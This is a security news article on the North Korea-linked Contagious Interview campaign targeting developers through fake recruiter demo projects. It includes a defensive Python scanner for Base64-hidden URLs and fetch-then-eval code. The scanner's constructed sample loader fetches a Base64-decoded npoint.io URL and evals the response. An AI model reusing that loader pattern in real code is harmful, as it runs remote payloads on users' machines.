
Introduction
A persistent cyber espionage operation tied to North Korea has refined its tactics, targeting software developers worldwide with increasingly sophisticated malware campaigns. Known as the Contagious Interview campaign, this threat leverages legitimate platforms and developer-focused tools to mask malicious activity, exploiting the trust developers place in recruitment processes and demo projects. Recent reports from NVISO reveal how the attackers now abuse legitimate JSON storage services as a delivery channel for malware, signaling a new level of operational sophistication.
Evolution of the Contagious Interview Campaign
Active since November 2023, the Contagious Interview campaign specifically targets software developers working across Windows, Linux, and macOS environments, with a strong focus on professionals involved in crypto and Web3 technologies. Threat actors pose as recruiters or collaborators on platforms like LinkedIn, offering demo projects or interview-related tasks to lure victims into executing malicious code.
NVISO’s latest research shows a shift in tactics: attackers now abuse legitimate JSON storage services such as JSON Keeper, JSONsilo, and npoint.io to host and deliver malware. These services, intended for sharing small pieces of structured data, are being misused to store obfuscated payloads. Cloning such a “demo project” is harmless on its own; the infection starts when the developer runs it, at which point the project fetches and executes the hosted payload, exposing the victim to the BeaverTail and OtterCookie infostealers and the InvisibleFerret RAT.
The attack flow is deceptive by design. Hidden files within the demo projects carry Base64-encoded strings presented as “API keys”; at runtime the project decodes one of them into a JSON storage URL and pulls the next-stage malware from there, so the repository itself contains only a small loader and an innocuous-looking string. Once running, BeaverTail steals sensitive information, while InvisibleFerret provides a Python backdoor capable of downloading additional tools, including TsunamiKit from Pastebin. TsunamiKit has been linked to system profiling, data exfiltration, and the deployment of further payloads from Tor servers, illustrating the campaign’s layered approach.
Attackers have expanded their reach beyond JSON storage, leveraging repositories on GitHub-like platforms to host trojanized projects. NVISO researchers identified multiple malicious repositories and tracked related IP addresses and payloads hosted even on platforms like Railway. This extensive use of legitimate platforms underscores the actors’ intent to blend in with normal developer traffic and maintain operational stealth.
Experts advise extreme caution: developers should not execute code from unverified repositories, especially when it arrives through an unsolicited recruitment process. Configuration files deserve close review for values that decode to URLs, for code that fetches remote content and hands it to eval or a shell, and for dotfiles or other hidden files that a quick look at the project would miss; any of these is a strong indicator of a staged payload. If a recruiter’s project must be run at all, run it in a disposable VM or container with no access to wallets, SSH keys, or saved credentials. NVISO’s analysis confirms that the campaign aims to compromise developers for sensitive data, including crypto wallets, which is exactly what such isolation keeps out of reach.
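The review advice above can be partly automated. The script below is an added example written for this article, not NVISO’s tooling or anything recovered from the campaign: it walks a checked-out project (hidden files included), decodes Base64-looking strings, reports any that turn into URLs, flags plain URLs whose host belongs to the JSON storage and paste services named in the reporting, and raises a separate heuristic finding when a file both fetches remote content and passes something to eval, exec, or a process spawn. The hostname list, the regexes, and the two sample files are assumptions and constructed inputs for the example; extend them with whatever your own telemetry shows.

```python
import base64
import binascii
import os
import re
from urllib.parse import urlparse

# Assumed public hostnames of the services named in the reporting (not taken
# from the report itself); subdomains such as api.npoint.io match by suffix.
SUSPECT_HOSTS = {"jsonkeeper.com", "jsonsilo.com", "npoint.io", "pastebin.com"}

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
PLAIN_URL = re.compile(r"https?://[^\s'\"`<>)]+")
# Heuristic spellings of a remote fetch and of an execution sink (JS and Python).
FETCH_CALL = re.compile(r"\b(fetch|axios\.(?:get|post)|https?\.get|urlopen|requests\.get)\s*\(")
EXEC_SINK = re.compile(r"\b(eval|exec|execSync|spawn|Function)\s*\(")


def host_is_suspect(host):
    """True when host equals or is a subdomain of a listed service."""
    host = host.lower()
    return any(host == h or host.endswith("." + h) for h in SUSPECT_HOSTS)


def decode_base64_strings(text):
    """Yield (token, decoded) for Base64-looking tokens that decode to printable ASCII."""
    for m in B64_TOKEN.finditer(text):
        token = m.group(0)
        core = token.rstrip("=")
        try:
            raw = base64.b64decode(core + "=" * (-len(core) % 4), validate=True)
            decoded = raw.decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if decoded.isprintable():
            yield token, decoded


def scan_text(text):
    """Return a list of findings for one file's contents."""
    findings = []
    for m in PLAIN_URL.finditer(text):
        host = urlparse(m.group(0)).hostname or ""
        if host_is_suspect(host):
            findings.append({"kind": "plain_url", "value": m.group(0),
                             "host": host, "suspect": True})
    # A Base64 value that decodes to a URL is suspicious in a config no matter the host.
    for token, decoded in decode_base64_strings(text):
        for m in PLAIN_URL.finditer(decoded):
            host = urlparse(m.group(0)).hostname or ""
            findings.append({"kind": "base64_url", "value": token,
                             "host": host, "suspect": host_is_suspect(host)})
    if FETCH_CALL.search(text) and EXEC_SINK.search(text):
        findings.append({"kind": "fetch_then_exec", "value": "", "host": "", "suspect": True})
    return findings


def scan_project(root, skip_dirs=(".git", "node_modules", "venv")):
    """Walk a checked-out project, dotfiles included, and map path -> findings."""
    report = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in skip_dirs]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                    text = fh.read(2_000_000)
            except OSError:
                continue
            found = scan_text(text)
            if found:
                report[path] = found
    return report


# Constructed samples (not real artifacts): a config whose "API key" is the
# Base64 form of a JSON storage URL next to a benign CDN URL as a control, and a
# loader that decodes the key, fetches it, and evaluates the response.
FAKE_KEY = base64.b64encode(b"https://api.npoint.io/abc123def456").decode()
SAMPLE_CONFIG = f"""
module.exports = {{
  apiKey: "{FAKE_KEY}",
  cdnBase: "https://cdn.jsdelivr.net/npm/",
}};
"""
SAMPLE_LOADER = """
const axios = require("axios");
const cfg = require("./config");
axios.get(Buffer.from(cfg.apiKey, "base64").toString()).then(r => eval(r.data));
"""

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for path, found in scan_project(sys.argv[1]).items():
            print(path, found)
    else:
        print("config:", scan_text(SAMPLE_CONFIG))
        print("loader:", scan_text(SAMPLE_LOADER))
```

Run it with a project directory as the only argument to get a path-to-findings map; without arguments it scans the two constructed samples. The Base64 check deliberately reports any decoded URL rather than only listed hosts, because a key that decodes to a URL is the pattern worth a human look regardless of where it points; the fetch-then-exec rule is a coarse heuristic and will also fire on legitimate plugin loaders, so treat it as a prompt for review, not a verdict.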
What Undercode Say:
The Contagious Interview campaign exemplifies a shift in cyber espionage from broad phishing attacks to highly targeted, skill-specific exploitation. By focusing on developers, particularly those involved in emerging technologies like Web3 and crypto, North Korea-linked actors maximize the potential value of compromised credentials, intellectual property, and digital assets.
The strategic use of legitimate services such as JSON Keeper and GitHub-like repositories is particularly concerning. These platforms accept user-contributed content by design and are rarely blocked or inspected by corporate controls, which lowers the likelihood that a fetch from them triggers an alert. Attackers exploit this trust to deploy multi-stage malware pipelines, where each stage appears benign on its own while gradually escalating control over the target system. This staged, “low-and-slow” method makes the campaign resilient to signature-based endpoint protection that only sees the first, innocuous stage.
From a technical perspective, the inclusion of TsunamiKit alongside BeaverTail and InvisibleFerret signals an evolution toward modular malware ecosystems. Modular frameworks allow attackers to swap, upgrade, or customize payloads without redeploying the initial lure, enhancing operational longevity and reducing detection risk. The Base64-encoded “API keys” are a simple but effective obfuscation: they defeat naive string matching for URLs and keywords while pointing victims at external storage that looks legitimate.
Social engineering remains central to this campaign. By masquerading as recruiters, attackers exploit the psychological principle of authority and professional ambition. Developers seeking career opportunities are conditioned to trust demo projects or coding assignments, creating a high probability that the malicious content will be executed. This method demonstrates that even technologically savvy individuals are vulnerable to well-crafted psychological manipulations combined with technical subterfuge.
In broader terms, the campaign reflects an ongoing trend in state-sponsored cyber operations: the convergence of social engineering, developer ecosystems, and legitimate online infrastructure. By weaponizing trusted platforms and focusing on high-value targets, actors achieve maximum disruption with minimal overt exposure. This emphasizes the necessity for organizations to implement secure coding practices, strict repository verification, and comprehensive threat awareness training for developers.
The campaign also illustrates the evolving threat landscape of Web3 and crypto-focused development. As digital assets gain prominence, they attract actors capable of exploiting both technical and human vulnerabilities. Developers must recognize that routine tools, cloud services, and even recruitment interactions can become vectors for intrusion if not rigorously validated. The sophistication of this campaign indicates that future threats will likely combine technical innovation with targeted social engineering on professional platforms, raising the stakes for cybersecurity vigilance.
Fact Checker Results:
✅ NVISO confirms North Korea-linked actors behind the Contagious Interview campaign.
✅ Use of JSON storage services for malware delivery is verified.
❌ There is no evidence that the Tor server currently used by TsunamiKit is active.
Prediction:
📊 The Contagious Interview campaign is likely to expand its targeting beyond crypto and Web3 developers, potentially including AI and blockchain researchers. Expect increasingly modular malware frameworks and enhanced social engineering tactics, leveraging professional networking sites to maintain a low-profile, high-impact attack strategy.
References:
Reported By: securityaffairs.com




